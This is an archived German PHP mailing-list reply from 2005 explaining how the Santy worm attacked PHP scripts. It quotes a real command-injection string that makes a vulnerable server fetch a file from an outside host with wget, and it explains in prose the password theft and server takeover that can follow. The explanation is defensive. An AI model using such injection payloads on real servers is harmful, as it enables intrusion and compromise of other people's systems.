phpbar.de logo

Mailinglisten-Archive

[php] [OT] Santy: Wurm attackiert PHP-Skripte

[php] [OT] Santy: Wurm attackiert PHP-Skripte

Lutz Zetzsche Lutz.Zetzsche at sea-rescue.de
Mit Mar 9 11:23:31 CET 2005


Hi Harald,

ANGEL Harald schrieb:
> http://www.heise.de/newsticker/result.xhtml?url=/newsticker/meldung/54623&words=Wurm%20attackiert%20PHP%20Skripte
>
> Darin kommt dieser code vor:
>
> http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\ wget
> www.visualcoders.net/spybot.txt;
>
> .. Nur versteh ich nicht ganz was der macht bzw wie der da was böses
> machen kann...

es wird versucht, die Linux-Befehle

     cd /tmp;
     wget www.visualcoders.net/spybot.txt;

in Dein PHP-Skript einzuschleusen und mit den Rechten des Skripts auf dem
Server auszuführen, d.h. wechsle in Verzeichnis /tmp und hole die Datei
xy. wget kann in einer solchen Datei auch Links folgen und dann weitere
(!) Dateien herunterladen.

Wenn Du ein verwundbares Skript hast, welches die übergebenen Parameter
nicht ausreichend prüft, kann es dem Angreifer also gelingen, die
übergebenen Befehle auf Deinem Rechner auszuführen und somit seinen Code
auf Deinen Rechner einzuschleusen und auszuführen.

Auf diese Weise kann er Deinen Server ausspähen und/oder für seine Zwecke
mißbrauchen. Eine Möglichkeit wäre z.B., Passwörter auszuspähen und damit
Zugriff auf die Datenbank, den gesamten Rechner etc. zu erlangen.
Inwieweit das gelingt, hängt natürlich von der Rechnerkonfiguration und
der Programmierung ab. Wer also z.B. irgendwo einen Datenbankbenutzer mit
root-Rechten in seinen Skripten benutzt und damit Benutzername und
Passwort im Klartext in einer Datei stehen hat, hat natürlich - was die
Datenbank angeht - verloren. Das gilt auch dafür, wenn das
MySQL-root-Passwort unverändert das Standard-Passwort ist, also ein leeres
Passwort. Gelingt es dem Angreifer, an die Passwort-Datei für das
Linuxsystem zu gelangen, dann wird es ganz übel. Er kann sich dann die
Datei auf seinen Rechner ziehen und dort ganz in Ruhe mit der "Brute
Force"-Methode versuchen, die Passwörter zu knacken. Da diese oft schlecht
gewählt sind, kann das unter Verwendung von Wörterbüchern sehr schnell
gehen. Ist das root-Passwort dann erst einmal geknackt, ist Dein Rechner
für den Angreifer komplett offen.

> Kann mir wer von euch erklären wie der Wurm arbeitet und wie er es schafft
> meine Website lahmzulegen?

Möglichkeit 1:
Er sucht Lücken in Deinen Skripten (verwendest Du zufällig phpBB?) und
startet soviele Anfragen an Deinen Server, daß dieser in die Knie geht.

Möglichkeit 2:
Er hat eine Lücke in Deinen Skripten gefunden und nutzt sie fröhlich, d.h.
er hat auf Deinem Server etwas installiert, was bei der Ausführung diese
Last verursacht.


Viele Grüße

Lutz


php::bar PHP Wiki   -   Listenarchive